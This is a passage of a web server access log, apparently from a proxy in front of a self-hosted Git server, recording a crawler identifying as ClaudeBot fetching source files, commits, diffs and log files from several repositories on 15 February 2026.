(KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/update_status.py" [Client 216.73.216.188] [Length 12943] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/nginx-reverse-proxy.conf?display=source" [Client 216.73.216.188] [Length 11859] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/import_csv.py" [Client 216.73.216.188] [Length 14244] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 216.73.216.188] [Length 12948] [Gzip 4.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/vite.config.ts" [Client 216.73.216.188] [Length 12135] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/mail_contact.py" [Client 216.73.216.188] [Length 16041] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/docker-compose.yml" [Client 216.73.216.188] [Length 2549] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/docker-compose.yml" [Client 216.73.216.188] [Length 13473] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" [Client 216.73.216.188] [Length 15895] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services/geminiService.ts" [Client 216.73.216.188] [Length 13110] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main" [Client 216.73.216.188] [Length 4222] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/docker-compose.yml" [Client 216.73.216.188] [Length 12156] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/tsconfig.json" [Client 216.73.216.188] [Length 11818] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/init_db.py" [Client 216.73.216.188] [Length 16123] [Gzip 5.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx-reverse-proxy.conf" [Client 216.73.216.188] [Length 11626] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/README.md" [Client 216.73.216.188] [Length 11274] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/Dockerfile" [Client 216.73.216.188] [Length 11575] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm" -[15/Feb/2026:08:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 216.73.216.188] [Length 11559] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_error.log" [Client 216.73.216.188] [Length 10925] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 216.73.216.188] [Length 11451] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f.patch" [Client 216.73.216.188] [Length 12243] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 216.73.216.188] [Length 11127] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_error.log" [Client 216.73.216.188] [Length 11629] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 216.73.216.188] [Length 11579] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker?display=rendered" [Client 216.73.216.188] [Length 16480] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/docker-compose.yml?display=source" [Client 216.73.216.188] [Length 12809] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Worker.cs" [Client 216.73.216.188] [Length 11911] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/docker-compose.yml" [Client 216.73.216.188] [Length 1058] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f.diff" [Client 216.73.216.188] [Length 11600] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html" [Client 216.73.216.188] [Length 22643] [Gzip 7.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Header.tsx" [Client 216.73.216.188] [Length 14776] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 216.73.216.188] [Length 11326] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/database.py" [Client 216.73.216.188] [Length 12295] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 216.73.216.188] [Length 11381] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/types.ts" [Client 216.73.216.188] [Length 11451] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 216.73.216.188] [Length 12298] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/.Notebook" [Client 216.73.216.188] [Length 9788] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.assets.json" [Client 216.73.216.188] [Length 44620] [Gzip 12.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/docker-compose.yml" [Client 216.73.216.188] [Length 11814] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.html" [Client 216.73.216.188] [Length 32588] [Gzip 9.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/status.json" [Client 216.73.216.188] [Length 11003] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.json" [Client 216.73.216.188] [Length 11243] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/update_status.py?display=source" [Client 216.73.216.188] [Length 13178] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/launch.json" [Client 216.73.216.188] [Length 11530] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/start.sh" [Client 216.73.216.188] [Length 14886] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Services.tsx" [Client 216.73.216.188] [Length 14620] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js/app.js" [Client 216.73.216.188] [Length 21996] [Gzip 6.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log" [Client 216.73.216.188] [Length 27607] [Gzip 5.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/global.json" [Client 216.73.216.188] [Length 11097] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/index.tsx" [Client 216.73.216.188] [Length 11830] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" [Client 216.73.216.188] [Length 15586] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/Dockerfile" [Client 216.73.216.188] [Length 9813] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.gitignore" [Client 216.73.216.188] [Length 12431] [Gzip 3.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/README.md" [Client 216.73.216.188] [Length 13293] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/css/style.css" [Client 216.73.216.188] [Length 13164] [Gzip 3.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/Dockerfile" [Client 216.73.216.188] [Length 997] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_stream_access.log" [Client 216.73.216.188] [Length 10934] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx.conf" [Client 216.73.216.188] [Length 11929] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/package.json" [Client 216.73.216.188] [Length 11669] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/status.json" [Client 216.73.216.188] [Length 11273] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_error.log" [Client 216.73.216.188] [Length 15253] [Gzip 6.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_access.log" [Client 216.73.216.188] [Length 15040] [Gzip 4.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/App.tsx" [Client 216.73.216.188] [Length 12714] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/js/script.js" [Client 216.73.216.188] [Length 15573] [Gzip 5.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_error.log" [Client 216.73.216.188] [Length 10938] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/nginx-reverse-proxy.conf" [Client 216.73.216.188] [Length 9817] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcConnectionTest" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3" [Client 216.73.216.188] [Length 11039] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" [Client 216.73.216.188] [Length 12012] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/main.py" [Client 216.73.216.188] [Length 21493] [Gzip 6.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:00 